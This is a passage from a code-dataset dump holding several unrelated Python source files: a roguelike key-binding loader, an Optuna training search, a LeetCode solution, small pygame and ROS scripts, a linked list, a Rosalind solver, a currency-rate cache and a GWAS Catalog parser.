False\r\n if 'ctrl+' in line:\r\n delete+=5\r\n _ctl = True\r\n else: _ctl = False\r\n if 'alt+' in line:\r\n delete+=4\r\n _alt = True\r\n else: _alt = False\r\n combinData=(_shf,_ctl,_alt,)\r\n if delete: line=line[delete:]\r\n \r\n if line[1] == '\\n': # character keys\r\n codeData=key_getchar(ord(line[0]))\r\n else: # special keys\r\n new = TEXT_TO_KEY.get(line[:-1],-1)\r\n codeData=new\r\n \r\n combin.append( combinData )\r\n codes.append( codeData )\r\n #\r\n \r\n print(\"Key bindings loaded from '{}'\".format(file_keyBindings))\r\n \r\n n = NUM_ALT_CMDS\r\n # error checking\r\n if not ( numCommands == n*len(COMMANDS.keys()) ):\r\n print(\"number of commands: \", numCommands)\r\n print(\"number expected: \", n*len(COMMANDS.keys()))\r\n raise(Error_wrongNumberCommandsLoaded)\r\n # bind special combined key input to commands #\r\n try:\r\n for i,v in enumerate(COMMANDS.keys()):\r\n for j in range(n):\r\n index = i*n + j\r\n bind.update({ (codes[index], combin[index],) : v })\r\n except:\r\n raise(Error_wrongNumberCommandsLoaded)\r\n#end def _init_keyBindings\r\n\r\ndef _keyBindings_writeFromDefault():\r\n try:\r\n with open(file_keyBindings,\"w+\") as file:\r\n file.write(KEYBINDINGS_TEXT_DEFAULT)\r\n print(\"'key_bindings.txt' created.\")\r\n except:\r\n print(\"FATAL ERROR! Failed to create key_bindings.txt\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"eyeCube/Softly-Roguelike","sub_path":"src/orangio.py","file_name":"orangio.py","file_ext":"py","file_size_in_byte":29066,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"2430913855","text":"import os\nimport random\nimport time\n\nimport optuna\nimport pytorch_lightning as pl\nimport torch\nfrom pytorch_lightning import Callback, loggers, seed_everything\nfrom pytorch_lightning.callbacks import LearningRateMonitor\n\nfrom optuna_lightning_module import GenomeModule\nfrom optuna_utils import prepare_study\n\n\nclass MetricsCallback(Callback):\n \"\"\"PyTorch Lightning metric callback.\"\"\"\n\n def __init__(self):\n super().__init__()\n self.metrics = []\n\n def on_validation_end(self, trainer, pl_module):\n self.metrics.append(trainer.callback_metrics)\n\n\ndef run_trials(\n ttargs,\n cluster=None,\n):\n # Try to avoid all trials trying to create the same study at once\n if ttargs.slurm == 1:\n time.sleep(random.randint(1, 30))\n\n study, h_search_frozen_trial = prepare_study(ttargs)\n\n study.optimize(lambda trial: objective(\n trial,\n hyperparser=ttargs,\n frozen_trial=h_search_frozen_trial,\n ),\n n_trials=ttargs.total_num_trials)\n\n\ndef objective(\n trial,\n hyperparser,\n frozen_trial,\n):\n\n # Seed the entire experiment with our set seed\n seed_everything(hyperparser.random_seed)\n\n if hyperparser.network == 1:\n folder = \"CNN/\"\n elif hyperparser.network == 2:\n folder = \"ResNet/\"\n elif hyperparser.network == 3:\n folder = \"Performer/\"\n elif hyperparser.network == 4:\n folder = \"Historical_Performer/\"\n elif hyperparser.network == 5:\n folder = \"Multimodal_Performer/\"\n\n # Filenames for each trial must be made unique in order to access each checkpoint.\n checkpoint_callback = pl.callbacks.ModelCheckpoint(\n os.path.join(hyperparser.model_dir, folder,\n \"trial_{}\".format(trial.number), \"{epoch}\"),\n monitor=\"val_loss\",\n save_top_k=1,\n )\n\n # The default logger in PyTorch Lightning writes to event files to be consumed by\n # TensorBoard. We don't use any logger here as it requires us to implement several abstract\n # methods. Instead we setup a simple callback, that saves metrics from each validation step.\n metrics_callback = MetricsCallback()\n\n tb_logger = loggers.TensorBoardLogger(\n save_dir=os.path.join(hyperparser.logdir, \"tensorboard\", folder),\n log_graph=True,\n default_hp_metric=False,\n )\n if hyperparser.one_cycle == 1:\n print('one_cycle')\n lr_monitor = LearningRateMonitor(logging_interval='step')\n\n # Looks like we need one trainer for the tuner\n trainer = pl.Trainer(\n deterministic=True,\n limit_val_batches=0.0,\n auto_scale_batch_size=\"power\",\n gpus=1 if torch.cuda.is_available() else None,\n )\n model = GenomeModule(hyperparser, trial, hyperparser.datasets_dir,\n frozen_trial)\n new_batch_size = trainer.tune(model, trial_num=trial.number)\n model.hparams.batch_size = new_batch_size\n del (trainer)\n\n # And then initializing a new one for the lr-finder to work\n trainer = pl.Trainer(\n logger=tb_logger,\n deterministic=True,\n accumulate_grad_batches=1,\n checkpoint_callback=checkpoint_callback,\n limit_val_batches=1.0,\n # Allow pytorch-lightning to find the optimal batch size\n auto_scale_batch_size=\"power\",\n max_epochs=hyperparser.num_epochs,\n gpus=1 if torch.cuda.is_available() else None,\n callbacks=[\n lr_monitor,\n metrics_callback,\n ],\n )\n\n lr_finder = trainer.tuner.lr_find(model,\n trial_num=trial.number,\n min_lr=1e-8)\n suggested_lr = lr_finder.suggestion(skip_begin=30)\n hyperparser.lr = suggested_lr\n model.hparams.lr = suggested_lr\n\n else:\n print('regular')\n trainer = pl.Trainer(\n deterministic=True,\n accumulate_grad_batches=1,\n logger=tb_logger,\n checkpoint_callback=checkpoint_callback,\n limit_val_batches=1.0,\n # checkpoint_callback=checkpoint_callback,\n # Allow pytorch-lightning to find the optimal batch size\n auto_scale_batch_size=\"power\",\n max_epochs=hyperparser.num_epochs,\n gpus=1 if torch.cuda.is_available() else None,\n callbacks=[\n metrics_callback,\n ],\n )\n model = GenomeModule(hyperparser, trial, hyperparser.datasets_dir,\n frozen_trial)\n if hyperparser.find_batch_size:\n trainer.tune(model)\n\n if hyperparser.hyper_search:\n print(\"Searching hyperparameter space\")\n else:\n print(\n \"Using best model params from hyperparameter search and crossvalidating\"\n )\n trainer.fit(model)\n\n if not hyperparser.hyper_search:\n # Pytorch lightning loads the best weights for us\n trainer.test(ckpt_path='best')\n\n return metrics_callback.metrics[-1][\"val_loss\"].item()\n","repo_name":"haakom/pay-attention-to-genomic-selection","sub_path":"src/optuna_search.py","file_name":"optuna_search.py","file_ext":"py","file_size_in_byte":5132,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"37282900858","text":"#\n# @lc app=leetcode id=1617 lang=python3\n#\n# [1617] Count Subtrees With Max Distance Between Cities\n#\n# https://leetcode.com/problems/count-subtrees-with-max-distance-between-cities/description/\n#\n# algorithms\n# Hard (62.98%)\n# Likes: 126\n# Dislikes: 20\n# Total Accepted: 3.6K\n# Total Submissions: 5.8K\n# Testcase Example: '4\\n[[1,2],[2,3],[2,4]]'\n#\n# There are n cities numbered from 1 to n. You are given an array edges of size\n# n-1, where edges[i] = [ui, vi] represents a bidirectional edge between cities\n# ui and vi. There exists a unique path between each pair of cities. In other\n# words, the cities form a tree.\n# \n# A subtree is a subset of cities where every city is reachable from every\n# other city in the subset, where the path between each pair passes through\n# only the cities from the subset. Two subtrees are different if there is a\n# city in one subtree that is not present in the other.\n# \n# For each d from 1 to n-1, find the number of subtrees in which the maximum\n# distance between any two cities in the subtree is equal to d.\n# \n# Return an array of size n-1 where the d^th element (1-indexed) is the number\n# of subtrees in which the maximum distance between any two cities is equal to\n# d.\n# \n# Notice that the distance between the two cities is the number of edges in the\n# path between them.\n# \n# \n# Example 1:\n# \n# \n# \n# \n# Input: n = 4, edges = [[1,2],[2,3],[2,4]]\n# Output: [3,4,0]\n# Explanation:\n# The subtrees with subsets {1,2}, {2,3} and {2,4} have a max distance of 1.\n# The subtrees with subsets {1,2,3}, {1,2,4}, {2,3,4} and {1,2,3,4} have a max\n# distance of 2.\n# No subtree has two nodes where the max distance between them is 3.\n# \n# \n# Example 2:\n# \n# \n# Input: n = 2, edges = [[1,2]]\n# Output: [1]\n# \n# \n# Example 3:\n# \n# \n# Input: n = 3, edges = [[1,2],[2,3]]\n# Output: [2,1]\n# \n# \n# \n# Constraints:\n# \n# \n# 2 <= n <= 15\n# edges.length == n-1\n# edges[i].length == 2\n# 1 <= ui, vi <= n\n# All pairs (ui, vi) are distinct.\n# \n#\n\n# @lc code=start\nfrom collections import defaultdict, deque\nimport itertools\n\nclass Solution:\n def countSubgraphsForEachDiameter(self, n: int, edges: List[List[int]]) -> List[int]:\n # Using Floyd-Warshall algorithm to calculate minimum distance between any node to any other node.\n # Since n <= 15, there is a maximum 2^15 subset of cities numbered from 1 to n.\n # Time complexity: O(2^n x n^2)\n # Space complexity: O(n^2)\n # def maxDistance(state): # return: maximum distance between any two cities in our subset. O(n^2)\n # cntEdge, cntCity, maxDist = 0, 0, 0\n # for i in range(n):\n # if state >> i & 1 == 0:\n # continue # Skip if city `i` not in our subset\n # cntCity += 1\n # for j in range(i + 1, n):\n # if state >> j & 1 == 0:\n # continue # Skip if city `j` not in our subset\n # cntEdge += dist[i][j] == 1\n # maxDist = max(maxDist, dist[i][j])\n # if cntEdge != cntCity - 1:\n # return 0 # Subset form an invalid subtree!\n # return maxDist\n\n # INF = n # Since cities form a tree so maximum distance between 2 cities always < n\n # dist = [[INF] * n for _ in range(n)]\n # for u, v in edges:\n # dist[u - 1][v - 1] = dist[v - 1][u - 1] = 1\n\n # for k in range(n):\n # for i in range(n):\n # for j in range(n):\n # dist[i][j] = min(dist[i][j], dist[i][k] + dist[k][j])\n\n # ans = [0] * (n - 1)\n # for state in range(1, 1 << n):\n # d = maxDistance(state)\n # if d > 0:\n # ans[d - 1] += 1\n # return ans\n\n\n # Bitmask + BFS every cities\n # Time complexity: O(2^n x n^2)\n # Space complexity: O(n^2)\n def bfs(src, cities):\n visited = {src}\n q = deque([(src, 0)]) # Pair of (vertex, distance)\n farthestDist = 0 # Farthest distance from src to other nodes\n while len(q) > 0:\n u, d = q.popleft()\n farthestDist = d\n for v in graph[u]:\n if v not in visited and v in cities:\n visited.add(v)\n q.append((v, d + 1))\n return farthestDist, visited\n\n def maxDistance(state): # return: maximum distance between any two cities in our subset. O(n^2)\n cities = set()\n for i in range(n):\n if state >> i & 1 == 1:\n cities.add(i)\n\n ans = 0\n for i in cities:\n farthestDist, visited = bfs(i, cities)\n if len(visited) < len(cities):\n return 0 # Can't visit all nodes of the tree -> Invalid tree\n ans = max(ans, farthestDist)\n return ans\n\n graph = defaultdict(list)\n for u, v in edges:\n graph[u - 1].append(v - 1)\n graph[v - 1].append(u - 1)\n\n ans = [0] * (n - 1)\n for state in range(1, 1 << n):\n d = maxDistance(state)\n if d > 0:\n ans[d - 1] += 1\n return ans\n\n\n\n # Bitmask + Diamter of the tree (BFS 2 times)\n # Time complexity: O(2^n x n)\n # Space complexity: O(n^2)\n # def bfs(src, cities):\n # visited = {src}\n # q = deque([(src, 0)]) # Pair of (vertex, distance)\n # farthestNode, farthestDist = -1, 0\n # while len(q) > 0:\n # farthestNode, farthestDist = u, d = q.popleft()\n # for v in graph[u]:\n # if v not in visited and v in cities:\n # visited.add(v)\n # q.append((v, d + 1))\n # return farthestNode, farthestDist, visited\n\n # def diameterOfTree(cities):\n # anyNode = cities.pop()\n # cities.add(anyNode)\n # farthestNode, _, visited = bfs(anyNode, cities)\n # if len(visited) < len(cities):\n # return 0 # Can't visit all nodes of the tree -> Invalid tree\n # _, dist, _ = bfs(farthestNode, cities)\n # return dist\n\n # def maxDistance(state): # return: maximum distance between any two cities in our subset. O(n)\n # cities = set()\n # for i in range(n):\n # if state >> i & 1 == 1:\n # cities.add(i)\n # return diameterOfTree(cities)\n \n # graph = defaultdict(list)\n # for u, v in edges:\n # graph[u - 1].append(v - 1)\n # graph[v - 1].append(u - 1)\n\n # ans = [0] * (n - 1)\n # for state in range(1, 1 << n):\n # d = maxDistance(state)\n # if d > 0:\n # ans[d - 1] += 1\n # return ans\n\n\n # Use Floyd-Warshall Algorithm to find all shortest paths.\n # Brute force all possible subsets and count subtrees with diameter d.\n # Time complexity: O(2^n x n^2)\n # Space complexity: O(n^2)\n # dist = [[float(\"inf\")] * n for _ in range(n)]\n # for u, v in edges:\n # dist[u - 1][v - 1] = dist[v - 1][u - 1] = 1\n\n # for k, i, j in itertools.permutations(range(n), 3):\n # dist[i][j] = min(dist[i][j], dist[i][k] + dist[k][j])\n\n # ans = [0] * (n - 1)\n # for k in range(2, n + 1):\n # for s in itertools.combinations(range(n), k):\n # e = sum(dist[i][j] for i, j in itertools.combinations(s, 2) if dist[i][j] == 1) \n # d = max(dist[i][j] for i, j in itertools.combinations(s, 2))\n # if e == k - 1:\n # ans[d - 1] += 1\n\n # return ans\n \n# @lc code=end\n\n","repo_name":"chenxu0602/LeetCode","sub_path":"1617.count-subtrees-with-max-distance-between-cities.py","file_name":"1617.count-subtrees-with-max-distance-between-cities.py","file_ext":"py","file_size_in_byte":7818,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"20537484261","text":"import random\r\nimport pygame\r\npygame.init()\r\n\r\nwidth = 600\r\nheight = 600\r\nwindow = pygame.display.set_mode([width,height])\r\n\r\n\r\nwhite = (255,255,255)\r\nblack = (0,0,0)\r\nwindow.fill(white)\r\n\r\nsize = 15\r\n\r\ndef distance(x,y,c,u):\r\n dis = (((c - x) ** 2) + ((u - y) ** 2)) ** 0.5\r\n return(dis)\r\ni = 0\r\nl = 0\r\ncircles = [random.randint(size,width - size),random.randint(size,height - size)]\r\npygame.draw.circle(window,black,(circles[i],circles[i + 1]),size)\r\npygame.display.flip()\r\nplaying = True\r\non = False\r\ncolor_change = False\r\ncolor = \"\"\r\nrun = 0\r\ncolor = black\r\ncolor_width = 30\r\ncolor_height = 30\r\ntrack = 0\r\nr = pygame.Rect(0,0,color_width,color_height)\r\ncolors = []\r\nfor v in range(int(width / color_width)):\r\n colors.append((random.randint(0,255),random.randint(0,255),random.randint(0,255)))\r\n \r\nwhile playing:\r\n\r\n\r\n x, y = pygame.mouse.get_pos()\r\n\r\n for event in pygame.event.get():\r\n check = True\r\n if event.type == pygame.QUIT:\r\n playing = False\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n\r\n for z in range(int(len(circles) / 2)):\r\n x,y = pygame.mouse.get_pos()\r\n dist = distance(x,y,circles[l],circles[l + 1])\r\n if dist <= size:\r\n on = True\r\n l += 2\r\n l = 0\r\n if on:\r\n \r\n circles.append(random.randint(size, width - size))\r\n circles.append(random.randint(size, height - size))\r\n i += 2\r\n \r\n \r\n pygame.draw.circle(window,color,(circles[i],circles[i + 1]),size)\r\n on = False\r\n for p in range(len(colors)):\r\n if y <= color_height:\r\n if x > track and x < track + color_width:\r\n color = colors[p]\r\n track += color_width\r\n track = 0\r\n \r\n elif event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:\r\n window.fill(white)\r\n color = (random.randint(0,255),random.randint(0,255),random.randint(0,255))\r\n for q in range(int(len(circles)) // 2):\r\n pygame.draw.circle(window,color,(circles[run],circles[run + 1]),size)\r\n run += 2\r\n run = 0\r\n for a in range(len(colors)):\r\n pygame.draw.rect(window,colors[a],r)\r\n r.x += color_width\r\n r.x = 0\r\n pygame.display.flip() \r\n","repo_name":"NedmacuoT/Code-Projects","sub_path":"Click Circles.py","file_name":"Click Circles.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74781645925","text":"# pylint: disable-msg=W0622\n\"\"\"cubicweb-company application packaging information\"\"\"\n\nmodname = 'company'\ndistname = 'cubicweb-%s' % modname\n\nnumversion = (0, 8, 0)\nversion = '.'.join(str(num) for num in numversion)\n\nlicense = 'LGPL'\ndescription = 'company component for the CubicWeb framework'\n\nauthor = 'Logilab'\nauthor_email = 'contact@logilab.fr'\nweb = 'http://www.cubicweb.org/project/%s' % distname\nclassifiers = [\n 'Environment :: Web Environment',\n 'Framework :: CubicWeb',\n 'Programming Language :: Python',\n 'Programming Language :: JavaScript',\n ]\n\n__depends__ = {'cubicweb': '>= 3.24.0',\n 'cubicweb-addressbook': None}\n","repo_name":"gurneyalex/cubicweb-company","sub_path":"cubicweb_company/__pkginfo__.py","file_name":"__pkginfo__.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73976332965","text":"#!/usr/bin/env python3\n\nimport rospy\nfrom math import sqrt\nfrom geometry_msgs.msg import Twist\nimport sys\n\ndef draw_triangle(l, speed):\n\trospy.init_node('draw_triangle', anonymous=True)\n\tpub = rospy.Publisher('/turtle1/cmd_vel', Twist, queue_size=10)\n\trate = rospy.Rate(10)\n\t\n\tvel = Twist()\n\n\twent = 0\n\tflag = 0\n\t\n\twhile flag < 3: #her yon icin ayri ayri kural\n\t\tsensivity = 36\n\t\tpiece = float(l/sensivity)\n\t\tvel.linear.x = 0\n\t\tvel.linear.y = 0\n\t\tvel.linear.z = 0\n\n\t\tvel.angular.x = 0\n\t\tvel.angular.y = 0\n\t\tvel.angular.z = 0\n\t\tdrw = sqrt(3)\n\t\tif flag == 0: #saga dogru sadece x yonunde ilerliyor\n\t\t\tvel.linear.x = piece\n\t\t\t\n\t\telif flag == 1: #sol uste dogru ilerleme\n\t\t\t\n\t\t\tvel.linear.x = -piece/2 \n\t\t\tvel.linear.y = drw*piece/2\n\t\t\t\n\t\telif flag == 2: #ucgeni bitirme\n\t\t\tvel.linear.x = -piece/2\n\t\t\tvel.linear.y = -piece*drw/2\n\t\t\n\t\tfor _ in range(sensivity):\n\t\t\tpub.publish(vel)\n\t\t\trate.sleep()\n\t\t\t\n\t\tflag += 1\n\t\t\nif __name__ == '__main__':\n\n\tspeed = 1\n\twhile 1:\n\t\tprint(\"q => exit\\nEnter side value : \", end=\"\")\n\t\tlenn = input()\n\t\tif lenn=='q':\n\t\t\tbreak\n\t\tlenn = int(lenn)\n\t\tdraw_triangle(lenn, speed)\n","repo_name":"afrat1/challenge1","sub_path":"turtlemove.py","file_name":"turtlemove.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40362657828","text":"class LinkedList:\n\n def __init__(self):\n self.head = self.tail = None\n self.length = 0\n\n def __repr__(self):\n res = []\n cur = self.head\n while cur:\n res.append(str(cur.val))\n cur = cur.next\n return \"->\".join(res)\n\n def __len__(self):\n return self.length\n\n def _get(self, index):\n cur = self.head\n while cur and index > 0:\n index -= 1\n cur = cur.next\n return cur, index\n\n\n def get(self, index):\n \"\"\"\n Get the value of the index-th node in the linked list. \n If the index is invalid, return -1.\n :type index: int\n :rtype: int\n \"\"\"\n cur, index = self._get(index)\n return cur.val if cur and index == 0 else -1\n\n\n def add_head(self, val):\n self.add_index(0, val)\n\n\n def add_tail(self, val):\n \"\"\"\n Append a node of value val to the last element of the linked list.\n :type val: int\n :rtype: void\n \"\"\"\n self.add_index(len(self), val)\n\n\n def add_index(self, index, val):\n \"\"\"\n Add a node of value val before the index-th node in the linked list. \n If index equals to the length of linked list, the node will be appended \n to the end of linked list. If index is greater than the length, \n the node will not be inserted.\n :type index: int\n :type val: int\n :rtype: void\n \"\"\"\n new = Node(val)\n if index == 0:\n new.next = self.head\n try:\n self.head.prev = new\n except AttributeError:\n self.tail = new\n self.head = new\n elif index == len(self):\n new.prev = self.tail\n try:\n self.tail.next = new\n except AttributeError:\n self.head = new\n self.tail = new\n elif 0 < index < len(self):\n cur, index = self._get(index)\n prev = cur.prev\n cur.prev = new\n prev.next = new\n new.next = cur\n new.prev = prev\n else:\n return\n self.length += 1\n\n\n def delete_index(self, index):\n \"\"\"\n Delete the index-th node in the linked list, if the index is valid.\n :type index: int\n :rtype: void\n \"\"\"\n node, index = self._get(index)\n if not node: return\n try:\n node.prev.next = node.next\n except AttributeError:\n self.head = node.next\n\n try:\n node.next.prev = node.prev\n except AttributeError:\n self.tail = node.prev\n self.length -= 1\n\n\nclass Node:\n def __init__(self, val):\n self.val = val\n self.next = self.prev = None\n\n def __repr__(self):\n return str(self.val)\n","repo_name":"steventhan/algo-review","sub_path":"linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1930068129","text":"#finding a shared spliced motif\r\n#from Bio import SeqIO\r\ndef fasta(s):\r\n results={}\r\n string=s.strip().split('>')\r\n for s in string:\r\n if len(s)==0:\r\n continue\r\n part = s.split()\r\n label = part[0]\r\n bases = ''.join(part[1:])\r\n results[label] = bases\r\n return results\r\nlarge_dataset = open('dataset/rosalind_lcsq.txt').read()\r\nlarge_dataset=fasta(large_dataset)\r\n\r\ntemp=[]\r\nfor k,v in large_dataset.items():\r\n temp.append(v)\r\ns,t=temp[0],temp[1] \r\n\r\nlengths = [[0 for j in range(len(t) + 1)] for i in range(len(s) + 1)]\r\n#creates array of len(s) containing arrays of len(t) filled with 0\r\nfor i, x in enumerate(s):\r\n for j, y in enumerate(t):\r\n if x == y:\r\n lengths[i + 1][j + 1] = lengths[i][j] + 1\r\n else:\r\n lengths[i + 1][j + 1] = max(lengths[i + 1][j], lengths[i][j + 1])\r\n\r\nspliced_motif = ''\r\nx, y = len(s), len(t)\r\nwhile x * y != 0:\r\n if lengths[x][y] == lengths[x - 1][y]:\r\n x -= 1\r\n elif lengths[x][y] == lengths[x][y - 1]:\r\n y -= 1\r\n else:\r\n spliced_motif = s[x - 1] + spliced_motif\r\n x -= 1\r\n y -= 1\r\nprint(spliced_motif)","repo_name":"QQianway/Rosalind","sub_path":"Finding a Shared Spliced Motif.py","file_name":"Finding a Shared Spliced Motif.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72244821925","text":"import aioredis\nimport httpx\nfrom fastapi_utils.tasks import repeat_every\nfrom .settings import settings\n\nAPI_URL = settings.EXCHANGE_RATE_API_URL\nREDIS_URL = f\"redis://{settings.redis_host}\"\n\n\nasync def get_rates_by_date(date: str):\n async with httpx.AsyncClient() as client:\n url = f\"{API_URL}/{date}?base=USD\"\n response = await client.get(url)\n data = response.json()\n return data['rates']\n\n\nasync def get_latest_currencies():\n async with httpx.AsyncClient() as client:\n url = f\"{API_URL}/symbols\"\n response = await client.get(url)\n data = response.json()\n return data['symbols']\n\n\n# update the supported currencies cache every 48 hours\n@repeat_every(seconds=60 * 60 * 48)\nasync def update_currencies_cache():\n currencies = await get_latest_currencies()\n values = {v['code']: v['description'] for v in currencies.values()}\n redis = aioredis.from_url(REDIS_URL)\n await redis.hmset(\"currencies\", values)\n","repo_name":"damildrizzy/currency_converter","sub_path":"app/app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17018030655","text":"import logging\nimport csv\nimport re\n\nfrom dipper.sources.Source import Source\nfrom dipper import config\nfrom dipper.utils.DipperUtil import DipperUtil\nfrom dipper.models.Model import Model\nfrom dipper.models.Genotype import Genotype\nfrom dipper.models.assoc.G2PAssoc import G2PAssoc\nfrom dipper.models.Reference import Reference\nfrom dipper.models.GenomicFeature import Feature, makeChromID\nfrom dipper.graph.RDFGraph import RDFGraph\n\nlogger = logging.getLogger(__name__)\n\n\nclass GWASCatalog(Source):\n \"\"\"\n The NHGRI-EBI Catalog of published genome-wide association studies.\n\n We link the variants recorded here to the curated EFO-classes using a\n \"contributes to\" linkage because the only thing we know is that the SNPs\n are associated with the trait/disease,\n but we don't know if it is actually causative.\n\n Description of the GWAS catalog is here:\n http://www.ebi.ac.uk/gwas/docs/fileheaders#_file_headers_for_catalog_version_1_0_1\n\n GWAS also pulishes Owl files described here\n http://www.ebi.ac.uk/gwas/docs/ontology\n\n\n Status: IN PROGRESS\n\n \"\"\"\n\n GWASFTP = 'ftp://ftp.ebi.ac.uk/pub/databases/gwas/releases/latest/'\n GWASFILE = 'gwas-catalog-associations_ontology-annotated.tsv'\n files = {\n 'catalog': {\n 'file': GWASFILE,\n 'url': GWASFTP + GWASFILE},\n 'efo': {\n 'file': 'efo.owl',\n 'url': 'http://www.ebi.ac.uk/efo/efo.owl'},\n 'so': {\n 'file': 'so.owl',\n 'url': 'http://purl.obolibrary.org/obo/so.owl'}\n }\n\n def __init__(self, graph_type, are_bnodes_skolemized):\n super().__init__(\n graph_type,\n are_bnodes_skolemized,\n 'gwascatalog',\n ingest_title='The NHGRI-EBI Catalog of published genome-wide association studies',\n ingest_url='http://www.ebi.ac.uk/gwas/',\n license_url='http://www.ebi.ac.uk/gwas/docs/about',\n data_rights='http://www.ebi.ac.uk/gwas/docs/about'\n # file_handle=None\n )\n\n if graph_type != 'rdf_graph':\n raise ValueError(\"GWAS Catalog requires a rdf_graph\")\n\n if 'test_ids' not in config.get_config() or 'gene' \\\n not in config.get_config()['test_ids']:\n logger.warning(\"not configured with gene test ids.\")\n else:\n self.test_ids = config.get_config()['test_ids']\n\n # build a dictionary of genomic location to identifiers,\n # to try to get the equivalences\n self.id_location_map = dict()\n\n return\n\n def fetch(self, is_dl_forced=False):\n \"\"\"\n\n :param is_dl_forced:\n :return:\n \"\"\"\n self.get_files(is_dl_forced)\n return\n\n def parse(self, limit=None):\n if limit is not None:\n logger.info(\"Only parsing first %s rows of each file\", limit)\n\n logger.info(\"Parsing files...\")\n\n if self.testOnly:\n self.testMode = True\n\n self.process_catalog(limit)\n\n logger.info(\"Finished parsing.\")\n return\n\n def process_catalog(self, limit=None):\n \"\"\"\n :param limit:\n :return:\n\n \"\"\"\n raw = '/'.join((self.rawdir, self.files['catalog']['file']))\n logger.info(\"Processing Data from %s\", raw)\n efo_ontology = RDFGraph(False, \"EFO\")\n logger.info(\"Loading EFO ontology in separate rdf graph\")\n efo_ontology.parse(self.files['efo']['url'], format='xml')\n efo_ontology.bind_all_namespaces()\n logger.info(\"Finished loading EFO ontology\")\n\n so_ontology = RDFGraph(False, \"SO\")\n logger.info(\"Loading SO ontology in separate rdf graph\")\n so_ontology.parse(self.files['so']['url'], format='xml')\n so_ontology.bind_all_namespaces()\n logger.info(\"Finished loading SO ontology\")\n\n line_counter = 0\n\n with open(raw, 'r', encoding=\"iso-8859-1\") as csvfile:\n filereader = csv.reader(csvfile, delimiter='\\t')\n header = next(filereader, None) # the header row\n header_len = len(header)\n logger.info('header length:\\t %i', header_len)\n\n for row in filereader:\n if not row:\n pass\n else:\n line_counter += 1\n if header_len != len(row):\n logger.error(\n 'BadRow: %i has %i columns', line_counter, row)\n pass\n\n (date_added_to_catalog,\n pubmed_num,\n first_author,\n pub_date,\n journal,\n link,\n study_name,\n disease_or_trait,\n initial_sample_description,\n replicate_sample_description,\n region,\n chrom_num,\n chrom_pos,\n reported_gene_nums,\n mapped_gene,\n upstream_gene_num,\n downstream_gene_num,\n snp_gene_nums,\n upstream_gene_distance,\n downstream_gene_distance,\n strongest_snp_risk_allele,\n snps,\n merged,\n snp_id_current,\n context,\n intergenic_flag,\n risk_allele_frequency,\n pvalue,\n pvalue_mlog,\n pvalue_text,\n or_or_beta,\n confidence_interval_95,\n platform_with_snps_passing_qc,\n cnv_flag,\n mapped_trait,\n mapped_trait_uri,\n study_accession,\n GENOTYPING_TECHNOLOGY\n ) = row\n\n if self.testMode:\n continue\n\n# 06-May-2015\t25917933\n# Zai CC\t20-Nov-2014\tJ Psychiatr Res\thttp://europepmc.org/abstract/MED/25917933\n# A genome-wide association study of suicide severity scores in bipolar disorder.\n# Suicide in bipolar disorder\n# 959 European ancestry individuals\tNA\n# 10p11.22\t10\t32704340\tC10orf68, CCDC7, ITGB1\tCCDC7\n# rs7079041-A\trs7079041\t0\t7079041\tintron\t0\t\t2E-6\t5.698970\n\n variant_curie, variant_type = self._get_curie_and_type_from_id(\n strongest_snp_risk_allele)\n\n if strongest_snp_risk_allele.strip() == '':\n logger.debug(\n \"No strongest SNP risk allele for %s:\\n%s\",\n pubmed_num, str(row))\n # still consider adding in the EFO terms\n # for what the study measured?\n continue\n\n if variant_type == 'snp':\n self._add_snp_to_graph(\n variant_curie, strongest_snp_risk_allele, chrom_num,\n chrom_pos, context, risk_allele_frequency)\n\n self._add_deprecated_snp(\n variant_curie, snp_id_current, merged, chrom_num, chrom_pos)\n\n self._add_snp_gene_relation(\n variant_curie, snp_gene_nums, upstream_gene_num,\n downstream_gene_num)\n elif variant_type == 'haplotype':\n self._process_haplotype(\n variant_curie, strongest_snp_risk_allele, chrom_num,\n chrom_pos, context, risk_allele_frequency, mapped_gene,\n so_ontology)\n elif variant_type is None:\n logger.warning(\n \"There's a snp id i can't manage: %s\",\n strongest_snp_risk_allele)\n continue\n\n description = self._make_description(\n disease_or_trait, initial_sample_description,\n replicate_sample_description,\n platform_with_snps_passing_qc, pvalue)\n\n self._add_variant_trait_association(\n variant_curie, mapped_trait_uri, efo_ontology,\n pubmed_num, description)\n\n if not self.testMode and (\n limit is not None and line_counter > limit):\n break\n\n # TODO loop through the location hash,\n # and make all snps at that location equivalent\n for l in self.id_location_map:\n snp_ids = self.id_location_map[l]\n if len(snp_ids) > 1:\n logger.info(\"%s has >1 snp id: %s\", l, str(snp_ids))\n return\n\n def _process_haplotype(\n self, hap_id, hap_label, chrom_num, chrom_pos, context,\n risk_allele_frequency, mapped_gene, so_ontology):\n\n if self.testMode:\n graph = self.testgraph\n else:\n graph = self.graph\n geno = Genotype(graph)\n model = Model(graph)\n # add the feature to the graph\n hap_description = None\n if risk_allele_frequency != '' and risk_allele_frequency != 'NR':\n hap_description = str(risk_allele_frequency) + ' [risk allele frequency]'\n\n model.addIndividualToGraph(\n hap_id, hap_label.strip(), self.globaltt['haplotype'], hap_description)\n geno.addTaxon(self.globaltt[\"Homo sapiens\"], hap_id)\n\n snp_labels = re.split(r';\\s?', hap_label)\n chrom_nums = re.split(r';\\s?', chrom_num)\n 